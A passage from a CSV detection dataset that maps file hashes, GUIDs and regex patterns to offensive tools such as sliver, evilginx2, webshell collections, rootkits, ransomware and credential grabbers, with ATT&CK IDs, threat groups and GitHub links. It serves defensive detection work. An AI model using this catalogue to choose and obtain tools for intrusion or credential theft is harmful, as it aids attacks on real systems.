fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22808" "*1d389e53c658a3919dfcd0d1e3dd08c34a2e875eb1520ec0b9648e43e25eaabc*",".{0,1000}1d389e53c658a3919dfcd0d1e3dd08c34a2e875eb1520ec0b9648e43e25eaabc.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","22809" "*1d3ac5240766338d781a6a0820e6bcec4db675910ce4bb2b1a96d45e71cf2495*",".{0,1000}1d3ac5240766338d781a6a0820e6bcec4db675910ce4bb2b1a96d45e71cf2495.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22810" "*1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2*",".{0,1000}1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22811" "*1d49fd236c80d04b58e6b18b516392332dc80171a56d03104be873eb9978e889*",".{0,1000}1d49fd236c80d04b58e6b18b516392332dc80171a56d03104be873eb9978e889.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22812" "*1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369*",".{0,1000}1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22813" "*1d502988647b7e21c22e7300484d382f04132e3df644d93752457041a4aeb21a*",".{0,1000}1d502988647b7e21c22e7300484d382f04132e3df644d93752457041a4aeb21a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22814" "*1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef*",".{0,1000}1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22815" "*1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9*",".{0,1000}1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22816" "*1d6cb6d414c0b9502a585b5b4ec30b76823c0a91dd4d1d301af484c47e39c426*",".{0,1000}1d6cb6d414c0b9502a585b5b4ec30b76823c0a91dd4d1d301af484c47e39c426.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","22821" "*1d6ccca21efe8d8de4cc4aa1598fc4d9ed15e82f66c84f927b411f255e0faa8c*",".{0,1000}1d6ccca21efe8d8de4cc4aa1598fc4d9ed15e82f66c84f927b411f255e0faa8c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22822" 
"*1d6d4c0b001fc20d404d6e2ec3625d9fc245c31484023e2ac7a3b123eec8cce1*",".{0,1000}1d6d4c0b001fc20d404d6e2ec3625d9fc245c31484023e2ac7a3b123eec8cce1.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","22823" "*1d70076be53e454fdb7dda0570961920e6bfe2d11ab0080064e206dd20c83333*",".{0,1000}1d70076be53e454fdb7dda0570961920e6bfe2d11ab0080064e206dd20c83333.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22824" "*1d72c6c584e8d98f42b7ed368a592e7d24bd773f611f174fa9834c0d949a46fb*",".{0,1000}1d72c6c584e8d98f42b7ed368a592e7d24bd773f611f174fa9834c0d949a46fb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22827" "*1d74b18520b9569c5c602ee48a995069dddb67e6343ae2cadce691f1e72609d0*",".{0,1000}1d74b18520b9569c5c602ee48a995069dddb67e6343ae2cadce691f1e72609d0.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22828" "*1d86c9e3eb7fe0980381f071b0416ba1f53f665c18b418b66c0ce2344d98a135*",".{0,1000}1d86c9e3eb7fe0980381f071b0416ba1f53f665c18b418b66c0ce2344d98a135.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22832" "*1d89fe4074ee5023c5c784c5e1020cb74eef55f476900db9ad1431f6d25bde22*",".{0,1000}1d89fe4074ee5023c5c784c5e1020cb74eef55f476900db9ad1431f6d25bde22.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","22833" "*1d8c3c650deb96f67cc45bd76fc298c483cb961f04ce157bbda8e5f2cf3f12ff*",".{0,1000}1d8c3c650deb96f67cc45bd76fc298c483cb961f04ce157bbda8e5f2cf3f12ff.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22834" "*1d94828540ae000cecb082b08ad72b9dfe44069af779a91ae3b827671efdc5d3*",".{0,1000}1d94828540ae000cecb082b08ad72b9dfe44069af779a91ae3b827671efdc5d3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22836" "*1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb*",".{0,1000}1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#filehash","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","22838" "*1d9c55784ea8bb607ae075d4cf53a294b6ff05434414ecfddce740fb2e1e78da*",".{0,1000}1d9c55784ea8bb607ae075d4cf53a294b6ff05434414ecfddce740fb2e1e78da.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22839" "*1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787*",".{0,1000}1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","22842" "*1da30fe79063333fc5fa8dbf291b5bcc0c07e1ae64722b4de7177eecfa261198*",".{0,1000}1da30fe79063333fc5fa8dbf291b5bcc0c07e1ae64722b4de7177eecfa261198.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - 
TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22843" "*1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa*",".{0,1000}1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22844" "*1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64*",".{0,1000}1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","22846" "*1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b*",".{0,1000}1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22847" "*1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e*",".{0,1000}1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22848" "*1DCD5A4349F3E617AF53DCFA24600FD169CFDD53DECE33FD72C6D66C2991D240*",".{0,1000}1DCD5A4349F3E617AF53DCFA24600FD169CFDD53DECE33FD72C6D66C2991D240.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22850" "*1dd570b9672796c8062a8871e279870508d3c04e213c4f379dbe625216d310a6*",".{0,1000}1dd570b9672796c8062a8871e279870508d3c04e213c4f379dbe625216d310a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22852" "*1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c*",".{0,1000}1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22853" "*1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9*",".{0,1000}1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing 
login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22854" "*1de467a837f7bf75b522bf34b0a2711213d73c7ca8101b4535a5bbdc94323ac7*",".{0,1000}1de467a837f7bf75b522bf34b0a2711213d73c7ca8101b4535a5bbdc94323ac7.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","22855" "*1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183*",".{0,1000}1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22856" "*1de7f78ed7238628f18928f1ba7a499e0aa844870865661110db15ed1cb3a1d5*",".{0,1000}1de7f78ed7238628f18928f1ba7a499e0aa844870865661110db15ed1cb3a1d5.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","22858" "*1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264*",".{0,1000}1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22859" "*1df43548fa3f18b13fef3d1d1e7c5349ec9de9446e391b9dbb09d1bd57cc9be3*",".{0,1000}1df43548fa3f18b13fef3d1d1e7c5349ec9de9446e391b9dbb09d1bd57cc9be3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22862" "*1df5732630ef44f85708aa64495812d0bae8f96e577b6c869277091eab28d54e*",".{0,1000}1df5732630ef44f85708aa64495812d0bae8f96e577b6c869277091eab28d54e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22863" 
"*1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6*",".{0,1000}1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#filehash","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","22864" "*1df8e073ca89d026578464b0da9748194ef62c826dea4af9848ef23b3ddf1785*",".{0,1000}1df8e073ca89d026578464b0da9748194ef62c826dea4af9848ef23b3ddf1785.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22865" "*1DFC488D-E104-4F35-98DA-F23BF6D3F9DC*",".{0,1000}1DFC488D\-E104\-4F35\-98DA\-F23BF6D3F9DC.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","22867" "*1e00cb67cc7d0f6610235ae151268e1aa8c38fe8f2675f9884baf1dde23d9303*",".{0,1000}1e00cb67cc7d0f6610235ae151268e1aa8c38fe8f2675f9884baf1dde23d9303.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","22868" "*1e05c9543989d8f9034dcd87f662ef8319c624a1988b800ad77676f55a2bc538*",".{0,1000}1e05c9543989d8f9034dcd87f662ef8319c624a1988b800ad77676f55a2bc538.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","22869" "*1e06baefc53c4bd963aca273bc8a05d683664c755a20baf2a04c95c5e3888ca0*",".{0,1000}1e06baefc53c4bd963aca273bc8a05d683664c755a20baf2a04c95c5e3888ca0.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","22870" "*1e078b5c876c4e5070b19a314be3b7385a3e2fc6a427f2ffcc2a2340b7c2b52f*",".{0,1000}1e078b5c876c4e5070b19a314be3b7385a3e2fc6a427f2ffcc2a2340b7c2b52f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22871" "*1E0986B4-4BF3-4CEA-A885-347B6D232D46*",".{0,1000}1E0986B4\-4BF3\-4CEA\-A885\-347B6D232D46.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential 
Access","https://github.com/swisskyrepo/SharpLAPS","1","0","#GUIDproject","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","22872" "*1e0d1441d6cc702501cd4fa67abc59887a1afedb25dc0b2aeda80cf168469883*",".{0,1000}1e0d1441d6cc702501cd4fa67abc59887a1afedb25dc0b2aeda80cf168469883.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22873" "*1e0e69ae876004f656546d2da0a7947e040a1bfe4fa9925b84a70cdc0ded69a0*",".{0,1000}1e0e69ae876004f656546d2da0a7947e040a1bfe4fa9925b84a70cdc0ded69a0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22875" "*1e189b7c760b1ff8db8fdf2290818908dbdad966d74bb77a37dd714f879f4e6f*",".{0,1000}1e189b7c760b1ff8db8fdf2290818908dbdad966d74bb77a37dd714f879f4e6f.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
